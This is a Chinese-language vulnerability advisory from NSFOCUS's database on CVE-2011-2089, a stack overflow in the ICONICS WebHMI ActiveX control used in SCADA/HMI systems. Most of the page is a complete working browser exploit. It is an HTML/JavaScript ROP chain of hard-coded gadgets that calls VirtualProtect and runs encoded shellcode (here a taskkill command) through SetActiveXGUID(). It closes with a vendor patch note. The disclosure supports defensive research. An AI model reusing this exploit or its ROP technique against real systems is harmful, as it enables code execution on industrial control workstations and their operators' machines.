绿盟科技NSFOCUS安全漏洞系统

安全研究

安全漏洞

ICONICS WebHMI VersionInfo ActiveX控件SetActiveXGUID() Method Ax_GUID参数溢出漏洞

发布日期：2011-05-03
更新日期：2011-05-11

受影响系统：

ICONICS WebHMI ActiveX Control

描述：

BUGTRAQ  ID: 47704
CVE(CAN) ID: CVE-2011-2089

ICONICS Genesis32是一套OPC、SNMP、BACnet和启用了Web的HMI及SCADA应用。

ICONICS Genesis32 WebHMI在实现上存在影响'GenVersion.dll'控件的栈缓冲区溢出漏洞，攻击者可利用此漏洞执行任意代码。

<*来源：Scott Bell

  链接：http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf
        http://osvdb.org/72135
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Scott Bell （）提供了如下测试方法：

<html>


<title>ICONICS WEBHMI ACTIVEX BOF ROP XPSP3</title>

<object classid="clsid:D25FCAFC-F795-4609-89BB-5F78B4ACAF2C" id="target"></object>
<script language="JavaScript">

//----------------------------------------------------
// Javascript helpers
//----------------------------------------------------

String.prototype.repeat = function(num) {
    return new Array(isNaN(num)? 1 : ++num).join(this);
}

function encode_dword(sdw) {
    if(sdw.length != 8) {
        alert('encode_dword: invalid dword: ' + sdw);
        return "";
    }
    var a = sdw.substr(0, 4);
    var b = sdw.substr(4, 8);
    return unescape('%u' + b + '%u' + a);
}

function junk_dword(char) {
    var charCodeStr = char.charCodeAt(0).toString(16);
    var expr = charCodeStr.repeat(4)
    return encode_dword(expr);
}

//----------------------------------------------------
// Shellcode
//
// use payload/windows/exec
// set CMD 'cmd.exe /q /k taskkill /f /IM iexplore.exe'
// generate -t js_le -b '\x00'
//----------------------------------------------------

var shellcode = unescape('%u9090').repeat(200) + unescape(
'%ueaba%ud0be%udba1%ud9de%u2474%u5df4%uc933%u3bb1' +
'%u5531%u8314%ufced%u5503%u0810%u2c4b%u4549%ucdb4' +
'%u358a%u283c%u67bb%u385a%ub7ee%u6c28%u3c03%u857c' +
'%u3090%uaaa9%ufe11%u858f%ucfa2%u490f%u4e60%u90ec' +
'%ub0b5%u5acd%ub1c8%u860a%ue323%uccc3%u1396%u9067' +
'%u122a%u9ea7%u6c13%u61c2%uc6e7%ub1cd%u5d58%u2985' +
'%u39d2%u4b36%u5a37%u020a%ua83c%u95f8%ue194%ua401' +
'%uadd8%u083f%uacd5%uaf78%udb06%ud372%udbbb%ua940' +
'%u6e67%u0955%uc8e3%uabbd%u8e20%ua736%uc58d%ua411' +
'%u0a10%ud02a%uad99%u50fd%u89d9%u39d9%ub0b9%ue478' +
'%ucd6c%u409b%u6bd0%u63d7%u0d05%ue9ba%u9cd8%u57c0' +
'%u9eda%uf7ca%uafb3%u9841%u30c4%udc80%ud32b%u2901' +
'%u4dc4%u90c0%u6e89%ud63e%uecb7%ua7cb%uec43%ua2b9' +
'%uab08%udf52%u5901%u4c55%u4821%u1f36%u5cb9%ua7dc' +
'%u8024%u0931%uef87%u8926%u8eb3%ua2cb%u3950%u5940' +
'%u9687%u81fe%ua1e8%ue1b3%u549f%u9234%uf933%u37b6' +
'%u60e2%udd4f%u41fa');

//----------------------------------------------------
// ROP Gadgets
//
// Modules used: kernel32, user32, shell32, rpcrt4, ole32
//----------------------------------------------------

// Saves ESP into EAX
var save_esp_gadget = encode_dword("77EEDC67") +   // # DEC EAX # PUSH ESP # POP EBP # RETN 4
                      junk_dword("X") +
                      encode_dword("7CB09A4D") +   // # XCHG EAX,EBP # RETN
                      junk_dword("Y");

// This will inc ESP by 16 + 4 + 4 + 4 = 28 bytes

var jump_over_params_gadget =
    encode_dword('7C80DFD8');  // # ADD ESP,10 # POP EDI # POP ESI # POP EBX # RETN

var virtual_protect_call = encode_dword('7c801ad4');   // &Kernel32.VirtualProtect

// 5 parameter placeholders and 1 static
var placeholders = junk_dword('P') +  // PPPP 8   == INITIAL ESP + 8  p1 - retaddr (shellcode)
                   junk_dword('Q') +  // QQQQ 12                      p2 - lpaddr  (shellcode)
                   junk_dword('R') +  // RRRR 16                      p3 - size
                   junk_dword('S') +  // SSSS 20                      p4 - perms
                   junk_dword('T');   // TTTT 24                      p5 - oldperms

var extra_junk   = junk_dword('Y');   // JUNK (because jump gadget skips 28 bytes)

var copy_eax_edx = encode_dword('7CB1B102'); // # MOV EDX,EAX # MOV EAX,EDX # RETN
var copy_eax_ecx = encode_dword('7e419167'); // # XCHG EAX,ECX # RETN
                                             // ^ Note: destroys EAX
var xchg_eax_edx = encode_dword('7CBB9C74'); // # XCHG EAX,EDX # RETN
var inc_ecx = encode_dword('775F0CFF');      // # INC ECX # RETN
var add_eax_64h = encode_dword('77550F6F');  // # ADD EAX,64 # RETN
var add_eax_328h = encode_dword('7756DF51'); // # ADD EAX,328 # RETN
var clear_eax = encode_dword('7E456160');    // # XOR EAX,EAX # RETN
var dec_ecx = encode_dword('7CAA881F');      // # DEC ECX # RETN
var pop_eax = encode_dword('7CB1B822');      // # POP EAX # RETN
var xchg_eax_ecx = encode_dword('7E4462ED'); // # XCHG EAX,ECX # RETN
var xchg_eax_esp = encode_dword('7CB93033'); // # XCHG EAX,ESP # RETN

var restore_eax_from_edx = xchg_eax_edx + copy_eax_edx;

var set_eax_40h = clear_eax +
    encode_dword('77550F6F').repeat(2) +  // +64h x 2 - # ADD EAX,64 # RETN
    encode_dword('7CA7BC50').repeat(2) +  // -41h x 2 - # SUB EAX,41 # RETN
    encode_dword('7C812FA6').repeat(6);   //  -1  x 6 - # DEC EAX # RETN

// Copy contents of EDX to location pointed to by ECX (used to write our params)
var write_arg = encode_dword('77EB2BE3');  // # MOV DWORD PTR DS:[ECX],EDX # RETN

var sploit = unescape('%u9090').repeat(255) +  // Padding for BOF
             save_esp_gadget +                 // Save ESP into EAX
             jump_over_params_gadget +         // Jump over VirtualProtect params
             virtual_protect_call +
             placeholders +
             extra_junk +
             copy_eax_edx +                    // Prep EDX
             copy_eax_ecx +                    // Prep ECX

             inc_ecx.repeat(21) +       // Point ECX at param 1 (retaddr)
             restore_eax_from_edx +     // EAX was destroyed by copy_eax_ecx gadget :/
             add_eax_64h.repeat(5) +    // Bump EAX 'til it points to our shellcode
             copy_eax_edx +             // Copy it into EDX in prep for write
             write_arg +                // Write EDX (shellcode ptr) to [ECX]
                                        // retaddr for VirtualProtect which is our shellcode
             inc_ecx.repeat(4) +
             write_arg +                // Write EDX again (shellcode ptr) for param 1: lpaddr
             inc_ecx.repeat(4) +        // Bump ECX by 4 (so that it points at param 2)

             clear_eax +                // Zero out EAX register
             add_eax_328h +             // Bump up EAX by 600 to allow 600 bytes shellcode
             copy_eax_edx +             // Write EAX to EDX in prep for param
             write_arg +                // Write EDX (size) to ECX (points to param 3: dwsize)

             inc_ecx.repeat(4) +        // Bump ECX by 4 (so that it points at param 3)
             set_eax_40h +              // Set EAX to 0x40 (PAGE_EXECUTE_READWRITE)
             copy_eax_edx +             // Copy EAX to EDX in prep for param write
             write_arg +

             inc_ecx.repeat(4) +        // Bump ECX by 4 (so that it points at param 4)
             pop_eax +
             encode_dword('0012f878') + // Get a static, writable address into EAX

             // Note: if you get ERROR_NOACCESS on VirtualProtect then you probably have
             // to pick a different static, writeable address.

             copy_eax_edx +
             write_arg +                // Put our static, writable address in param 5

             dec_ecx.repeat(20) +       // Roll ECX back to point to our VirtualProtect call
             xchg_eax_ecx +             // Put ECX into EAX
             xchg_eax_esp +             // Put EAX into ESP (RET will trigger VirtualProtect)
             junk_dword('Q') +          // If we hit this, we failed...
             shellcode;

//----------------------------------------------------
// Trigger
//----------------------------------------------------

target.SetActiveXGUID(sploit);

</script>
</html>

建议：

厂商补丁：

ICONICS
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.iconics.com/

浏览次数：2863
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客